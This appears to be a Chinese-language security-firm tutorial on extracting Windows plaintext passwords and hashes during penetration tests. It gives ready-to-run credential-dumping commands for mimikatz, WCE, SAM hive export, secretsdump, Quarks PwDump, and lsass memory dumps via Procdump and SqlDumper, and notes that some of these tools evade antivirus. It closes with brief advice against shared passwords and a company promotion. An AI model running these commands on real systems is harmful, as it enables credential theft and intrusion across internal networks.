渗透测试，可用于测试企业单位内网的安全性，而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环，一旦某台机器的密码在内网中是通用的，那么该内网的安全性将会非常糟糕。

本期安仔课堂，ISEC实验室的李老师为大家介绍一些抓取Windows明文或Hash的方式。

一、mimikatz

mimikatz是一款轻量级的调试神器，功能非常强大，其中最常用的功能就是抓取明文或Hash。

用法：

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" 

图1

另外，需要注意的是，当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，如下图，密码字段显示为null，此时可以通过修改注册表的方式抓取明文，但需要用户重新登录后才能成功抓取。

图2

修改注册表命令：

图3

修改成功后，等用户下次再登录的时候，重新运行mimikatz，即可抓到明文密码，如需恢复原样，只需将上图REG_DWORD的值1改为0即可。

图4

二、Getpass

Getapss是由闪电小子根据mimikatz编译的一个工具，可以直接获取明文密码，直接运行Getpass.exe即可。

图5

三、Wce

Wce是一款Hash注入神器，不仅可以用于Hash注入，也可以直接获取明文或Hash。

抓明文：wce.exe -w

图6

抓hash：wce.exe -l

图7

四、 Powershell

当目标系统存在powershell时，可直接一句powershell代码调用抓取，前提是目标可出外网，否则需要将ps1脚本放置内网之中。

抓明文:

图8

图9

抓Hash:

图10

图11

五、 Sam

1.使用注册表来离线导出Hash

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save hklm\security security.hiv

导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。

图12

或者导入sam.hiv和system.hiv的syskey获取密码Hash。

图13

除了cain，也可以使用mimikatz加载sam.hiv和sam.hiv来导出Hash。

用法：mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

图14

或者使用impacket 套件中的 secretsdump.py 脚本去解密，也是可以的。

用法：python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL 

图15

2.使用mimikatz在线导出sam的Hash

用法：mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit" 

图16

六、PwDump7

Pwdump7可以在CMD下直接提取系统中用户的密码Hash，直接运行即可。

图17

七、 Quarks PwDump

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具，它可以抓取Windows平台下多种类型的用户凭据，包括：本地帐户、域帐户、缓存的域帐户和Bitlocker。

用法：

导出本地用户Hash：

Quarks PwDump.exe --dump-hash-local

图18

配合Ntdsutil导出域用户Hash：

QuarksPwDump –dump-hash-domain –ntds-file c:\ntds_save.dit

图19

八、 Procdump + mimikatz

Procdump 是微软出品的一个小工具，具备一定的免杀功能。

用法：

1.生成dump文件

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

图20

2.mimikatz加载dump文件

mimikatz.exe"sekurlsa::minidumplsass.dmp""sekurlsa::logonPasswords full" "exit" 

图21

九、SqlDumper + mimikatz

SqlDumper.exe是从SQL Server安装目录下提取出来的，功能和Procdump相似，并且也是微软出品的，体积远小于Procdump，也具备一定的免杀功能。SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared，number代表SQL Server的版本，参考如下：

140 for SQL Server 2017

130 for SQL Server 2016

120 for SQL Server 2014

110 for SQL Server 2012

100 for SQL Server 2008

90 for SQL Server 2005

如果目标机器没有安装SQL Server，可以自己上传一个SqlDumper.exe。

用法：

1.查看lsass.exe 的ProcessID

tasklist /svc |findstr lsass.exe

图22

2.导出dump文件

Sqldumper.exe ProcessID 0 0x01100

图23

3.mimikatz加载dump文件

mimikatz.exe"sekurlsa::minidumpSQLDmpr0001.mdmp""sekurlsa::logonPasswords full""exit"

图24

成功导出明文或Hash破解后，一旦密码通用，将会威胁整个内网。因此，内网管理人员应尽量避免使用通用密码，并及时安装防护软件。

安胜作为国内领先的网络安全产品及服务提供商，秉承“创新为安，服务致胜”的经营理念，专注于网络安全类产品的生产与服务；以“研发+服务+销售”的经营模式，“装备+平台+服务”的产品体系，在技术研究、研发创新、产品化等方面已形成一套完整的流程化体系，为广大用户提供量体裁衣的综合解决方案！

我们拥有独立的技术及产品的预研基地—ISEC实验室，专注于网络安全前沿技术研究，提供网络安全培训、应急响应、安全检测等服务。此外，实验室打造独家资讯交流分享平台—“ISEC安全e站”，提供原创技术文章、网络安全信息资讯、实时热点独家解析等。

2018年

承担全国两会网络安保工作；

承担青岛上合峰会网络安保工作。

2017年

承担全国两会网络安保工作；

承担金砖“厦门会晤”网络安保工作；

承担北京“一带一路”国际合作高峰论坛网络安保工作；

承担中国共产党第十九次全国代表大会网络安保工作；

承担第四届世界互联网大会网络安保工作。

2016年

承担全国两会网络安保工作；

为贵阳大数据与网络安全攻防演练提供技术支持；

承担G20峰会网络安保工作；

承担第三届世界互联网大会网络安保工作。

2015年

承担第二届世界互联网大会网络安保工作。

不忘初心、砥砺前行；未来，我们将继续坚守、不懈追求，为国家网络安全事业保驾护航！